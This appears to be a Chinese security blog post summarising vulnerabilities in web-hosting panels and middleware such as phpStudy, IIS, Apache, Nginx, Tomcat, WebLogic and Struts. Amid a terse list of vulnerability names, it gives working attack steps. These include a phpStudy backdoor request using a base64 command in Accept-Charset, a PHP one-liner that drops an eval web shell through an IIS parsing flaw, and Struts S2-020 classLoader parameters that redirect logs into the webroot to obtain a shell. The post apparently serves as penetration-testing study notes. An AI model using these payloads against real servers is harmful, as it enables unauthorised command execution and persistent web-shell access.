web建站与中间漏洞总结

web建站漏洞总结

windows主流建站工具

宝塔
护卫神
phpstudy
upupw

phpstudy
phpstudy两个版本后门漏洞php-5.4.45与php-5.2.17两个版本
利用方法

请求包中Accept-Encoding: gzip, deflate,将gzip,deflate中间的空格删掉
Accept-Charset:+所执行命令的base64编码
如
c3lzdGVtKCduZXQgdXNlcicpOw==

在这里插入图片描述
一句话木马利用
在这里插入图片描述
修改蚁剑内的请求信息,处Header头修改如图下
即可连接
在这里插入图片描述

十大中间件漏洞类型总结

1.)IIS漏洞

1、PUT漏洞

2、短文件名猜解

3、远程代码执行

4、解析漏洞
IIS6.0 目录解析漏洞和文件解析漏洞;后面的不会处理因为可以进行构造.asp;.jpg 默认解析asp,asa,cer,cdx
IIS7.0 1.jpg/1.php进行解析 默认会当作
原因:配置文件的问题

跟木马有关系,如果是shell.php类即后面的名字设置为shell.php
<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>'); ?>
1.jpg/shell.php

2.)Apache漏洞

1、解析漏洞-->原理解析不了后面的后缀后即会往做解析内容导致-->从左往右进行解析导致
原因-->httpd.conf的配置文件出问题导致

2、目录遍历

3.)Niginx漏洞

1、文件解析

2、目录遍历

3、CRLF注入

4、目录穿越

4.)tomcat漏洞

1、远程代码执行

2、war后门文件部署

weblogic漏洞总结
5.)jboss漏洞

1、反序列化漏洞

2、war后门文件部署


6.)weblogic漏洞

1、反序列化漏洞

2、SSRF

3、任意文件上传

4、war后门文件部署

7.)strtuts漏洞

s2-020漏洞
原理:通过class.classLoader进行修改tomcat配置,以达到getshell的目的
常见组合拳
更改路径为日志的路径,然后结合日志记录的状况拿到shell
如
①class.classLoader.resources.context.parent.pipline.first.directory=wbeapps/ROOT
-->即修改为网站的根目录
②把日志的后缀修改为.jsp
class.classLoader.resources.context.parent.pipline.first.suffix=.jsp
③把日志的名字修改为shell
class.classLoader.resources.context.parent.pipline.first.prefix=.jsp

然后访问shell.jsp即可拿到shell

8.)java string 漏洞
9.)python
10.)其余组件的漏洞

1、FastCGI未授权访问、任意命令执行

2、PHPCGI远程代码执行

详解
九大漏洞类型详细规则学习
iis组件漏洞

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

goddemon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值